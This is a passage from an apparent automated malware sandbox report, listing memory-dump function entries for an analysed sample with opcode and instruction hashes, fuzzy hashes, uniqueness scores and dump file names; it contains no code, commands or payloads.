                                                                              • Opcode Fuzzy Hash: 801c1aeedc8c2e9a7fbc02b97c456d469cf8b6ccef5b24993b0978e4ef50b810
                                                                              • Instruction Fuzzy Hash: 4A01D436B101249BDB54A679DC14AEF77AADBC8250F00453AD10AD7340DE61DC0287D2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa5967715a6d0a6f7ed3887ce537e472dc60ff33a5607029d68ece82aee3fa62
                                                                              • Instruction ID: db4b526cdb407f0777744513200f5a99cbe6305d4854641e8a76747581f03c33
                                                                              • Opcode Fuzzy Hash: fa5967715a6d0a6f7ed3887ce537e472dc60ff33a5607029d68ece82aee3fa62
                                                                              • Instruction Fuzzy Hash: F221C0B5D01259ABCB10DF9AD884ADEFFB8FB48324F10812AE518A7300D374A944CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d46015a77cd776983f97e561ce0a765bc67547fe82d438fa4a464af9d85891d
                                                                              • Instruction ID: b261e1c1712da92907a9c1cc67b00fdcac2987cf204b8d80087837f96154d94e
                                                                              • Opcode Fuzzy Hash: 3d46015a77cd776983f97e561ce0a765bc67547fe82d438fa4a464af9d85891d
                                                                              • Instruction Fuzzy Hash: FF11C2B1D012599FCB00CF9AD884ADEFBB4FB48314F10812AE518B7300D374A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8aff204823626028155a4448092df9df1c3cb6b5c81328d2a14adc57eea0753
                                                                              • Instruction ID: f1c706bedb4c97f5e42d6bcc5e8aa07a6d3c77fb815907556ff62b38e80f042f
                                                                              • Opcode Fuzzy Hash: a8aff204823626028155a4448092df9df1c3cb6b5c81328d2a14adc57eea0753
                                                                              • Instruction Fuzzy Hash: 97016931B000101BDB6495ADE45872FA7DBDBC9B10F20883AE50ACB384EEA6DC534796
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05716b96152c67d74492fdbbb5747b888f7f79ba33df7cda3d6ef581cf0ab12d
                                                                              • Instruction ID: 3c572ba0858b8247e433db35bcc95023eac9f7fba8351822ade93232a8fa397b
                                                                              • Opcode Fuzzy Hash: 05716b96152c67d74492fdbbb5747b888f7f79ba33df7cda3d6ef581cf0ab12d
                                                                              • Instruction Fuzzy Hash: 3801AF75F000101BDB6495ADE850B3F73DAEBC9720F208839E50EC7344DE25DC064786
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: faf7f9a0d33a0f1c562c42a57541c658ed7cc157e7ace807cb7e152f062ce2eb
                                                                              • Instruction ID: 02c0106eb078d959a97dddd83267f5fa569b1828e4a4c174490c80ca01fdbf6c
                                                                              • Opcode Fuzzy Hash: faf7f9a0d33a0f1c562c42a57541c658ed7cc157e7ace807cb7e152f062ce2eb
                                                                              • Instruction Fuzzy Hash: DC018130B101158FDB64AEBCD55072F73DAE78A724F108439E10ECB384DA61DC028785
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78bd91fc470e07819ae6d4f1c91e1ea1ec74fc962136591046a940051e92b4e0
                                                                              • Instruction ID: 328429ef2cf6414370f04fc9e33c27b886a1cb44e09693f0426b27a9a5c6e067
                                                                              • Opcode Fuzzy Hash: 78bd91fc470e07819ae6d4f1c91e1ea1ec74fc962136591046a940051e92b4e0
                                                                              • Instruction Fuzzy Hash: 9A01FC31F10224AFCF649A69F941AAEB776F785314F104539E905E7344DB31EC058BC0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4cb62735f17ef67bf465b60a918b81f9617d51517030dea33781e74cfd49719a
                                                                              • Instruction ID: 4d29cfe53261aa4784ad059405458608a42eefd9e58974ed673947e1e61a097a
                                                                              • Opcode Fuzzy Hash: 4cb62735f17ef67bf465b60a918b81f9617d51517030dea33781e74cfd49719a
                                                                              • Instruction Fuzzy Hash: 21E02271E156486BCF70CA74DD2878B3F9ED782214F1088A5E004CB206E232DA40D3D2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ccfc188acbc9401bbfbbb0696a9303eea0ac9b63cf310385da65e9fb4991b2c
                                                                              • Instruction ID: e4a09e71c4258db3d427396473dc29aa3bf1169a3ea5e46984b64b70d934d388
                                                                              • Opcode Fuzzy Hash: 7ccfc188acbc9401bbfbbb0696a9303eea0ac9b63cf310385da65e9fb4991b2c
                                                                              • Instruction Fuzzy Hash: C9F08274A012098FC380EFBCD50066EBBE6BB85204F10817AD409C3799EF349952CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q